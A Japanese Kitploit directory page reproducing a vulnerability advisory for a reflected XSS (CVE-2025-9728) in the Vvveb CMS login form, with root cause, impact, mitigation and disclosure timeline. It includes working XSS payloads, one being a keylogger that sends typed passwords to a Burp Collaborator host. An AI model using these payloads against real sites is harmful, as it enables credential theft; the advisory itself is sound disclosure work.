Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Reflected-XSS-in-Vvveb-CMS-v1.0.7.2 — CVE-2025-9728: Vvveb CMS v1.0.7.2 のログインフォーム(メールおよびパスワードフィールド)における反射型XSS | Kitploit
ツール/GitHubGitHub/helloandrewpaul/reflected-xss-in-vvveb-cms-v1.0.7.2
脆弱性分析ウェブアプリケーション悪用フィッシングウェブセキュリティ論文と研究学習と教育
GitHubhelloandrewpaul/reflected-xss-in-vvveb-cms-v1.0.7.2

Reflected-XSS-in-Vvveb-CMS-v1.0.7.2

CVE-2025-9728: Vvveb CMS v1.0.7.2 のログインフォーム(メールおよびパスワードフィールド)における反射型XSS

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
11ヶ月前未レビュー

ログインフォーム(メールアドレス・パスワードフィールド)における反射型XSS Vvveb CMS v1.0.7.2

  • 著者: Andrew Paul
  • 発見日: 2025年8月12日
  • ベンダー: Vvveb
  • ベンダーURL: http://vvveb.com
  • ベンダーGitHub: https://github.com/givanz/Vvveb
  • 影響を受けるバージョン: 1.0.7.2(およびそれ以前のバージョンも可能性あり)
  • CVE ID: CVE-2025-9728

概要

ユーザーログインフォームに、反射型クロスサイトスクリプティング(XSS)の脆弱性(CWE-79: ウェブページ生成時の入力の不適切な無害化('クロスサイトスクリプティング'))が存在します。email および password パラメータは、HTMLレスポンスに反映される前にサニタイズされていません。これにより、攻撃者は特別なURLを作成して悪意のあるスクリプトを注入でき、キーロガーペイロードによる認証情報の窃取につながります。これは、Burp Collaborator サーバーにパスワードデータを流出させることで確認されました。

OWASP Top 10 2021 マッピング

この脆弱性は、OWASP Top 10 2021 のいくつかのカテゴリにマッピングされます。

  • A03:2021 - Injection: アプリケーションは、適切なサニタイズを行わずに信頼できないデータをブラウザに送信するHTMLページに含めてしまうため、インジェクションに対して脆弱であり、攻撃者のスクリプトが実行される可能性があります。

  • A04:2021 - Insecure Design: ログインメカニズムは、ユーザーが入力した内容を反映する際にサーバーサイドでの出力エンコーディングという基本的なセキュリティ制御が欠如しているため、設計上安全ではありません。

  • A05:2021 - Security Misconfiguration: アプリケーションは、<input type="email"> のような脆弱なクライアント側の制御に不適切に依存しています。これは、攻撃者によって簡単にバイパスされるため、実際のセキュリティを提供しません。

脆弱性の詳細

この脆弱性の根本原因は、サーバーがユーザー提供データに対して出力エンコーディングを実行しないことです。ユーザーがログインフォームを送信すると、email および password フィールドに指定された値が、結果のページロード時に対応する <input> タグの value 属性に再挿入されます。ダブルクォーテーション(")を含むペイロードを提供することで、攻撃者は value 属性を抜け出し、新しいHTML属性(例:onkeyup)やまったく新しいタグ(例:<script>)を注入できます。この動作は email と password の両方のフィールドで確認されました。

攻撃ベクトルの可能性

この脆弱性は、攻撃者が被害者を騙して細工されたリクエストをサーバーに送信させるあらゆるベクトルを通じて悪用される可能性があります。最も一般的なベクトルはフィッシング攻撃であり、攻撃者はXSSペイロードを含む悪意のあるURLを作成し、被害者に送信します。被害者がリンクをクリックすると、ペイロードがブラウザ内で実行されます。

概念実証(PoC)

この脆弱性は、2つの異なる概念実証によって示されています。視覚的なアラートをトリガーする単純なスクリプトインジェクションと、ユーザーの認証情報を取得するより高度な攻撃です。提供された画像は、これらのPoCの直接的な証拠となります。

PoC A: シンプルなアラート確認

このPoCは、両方の脆弱なフィールドでの基本的なスクリプト実行を確認します。

ペイロード

  • Email: j4u6e"><script>alert('email')</script>ou1w
  • Password: j4u6e"><script>alert('password')</script>ou1w

再現手順

  1. ログインページ http(s)://example.com/user/login に移動します。
  2. 対応する入力フィールドにペイロードのいずれかを入力します。
  3. フォームを送信します。

結果

画面上にJavaScriptの alert() ボックスが表示され、脆弱性が確認されます。

入力フィールド内のペイロード

メールアラート

パスワードアラート

PoC B: キーロガーによる認証情報の窃取

このPoCは、パスワードのキーストロークを盗むことにより、重大な影響を示しています。

ペイロード

j4u6e" onkeyup="fetch('https://hg1n99wu463z4ujvj808u3f3ruxnlg95.oastify.com?data=' + btoa(this.value))"

再現手順

  1. ログインページ http(s)://example.com/user/login に移動します。
  2. キーロガーペイロードを password 入力フィールドに直接貼り付けます。
  3. 侵害されたフィールドに偽のパスワードを入力します。

結果

各キーストロークがキャプチャされ、攻撃者のBurp Collaboratorサーバーに送信されます。これにより、任意のスクリプトが実行可能であり、機密データを外部に漏洩できることが確認されます。

侵害された入力

Burp Suite Collaboratorに送信されたパスワード

ペイロードを含む脆弱なコード

影響

この脆弱性の悪用に成功すると、ユーザーのアカウントとブラウザセッションが完全に侵害される可能性があります。主な影響は次のとおりです。

  • 認証情報の窃取: PoCで実証されたように、攻撃者はユーザー名とパスワードをリアルタイムで盗むことができます。
  • セッションハイジャック: 攻撃者は注入されたスクリプトを使用して、ユーザーがログインした後にセッションクッキーを盗み、ユーザーになりすますことができます。
  • ウェブサイトの改ざんとフィッシング: 攻撃者はログインページの内容を改変して、より機密性の高い情報をフィッシングしたり、ブランドの評判を傷つけたりすることができます。
  • さらなる攻撃: この脆弱性は、ユーザーのブラウザに対するさらなる攻撃を開始したり、ユーザーを悪意のあるウェブサイトにリダイレクトしたりするために使用される可能性があります。

推奨される緩和策

ベストプラクティスは、多層防御のアプローチを採用し、入力検証と適切な出力エンコーディングを組み合わせることです。

入力検証(第一層)

優れたセキュリティ慣行として、サーバーは入力検証を実行し、明らかに悪意のあるパターンを含むリクエストを拒否する必要があります。これにより初期の防御層が提供されますが、唯一の修正として依存すべきではありません。

出力エンコーディング(必須の修正)

主要かつ最も重要な修正は、HTMLでレンダリングされる直前にすべてのユーザー提供データに出力エンコーディングを適用することです。htmlspecialchars() 関数を使用できます。

開示タイムライン

  • 発見日: 2025年8月12日
  • ベンダー通知日: 2025年8月12日
  • ベンダー確認日: 2025年8月12日
  • パッチリリース日: 2025年8月12日
  • 公開開示日: 2025年8月22日
ツールをダウンロード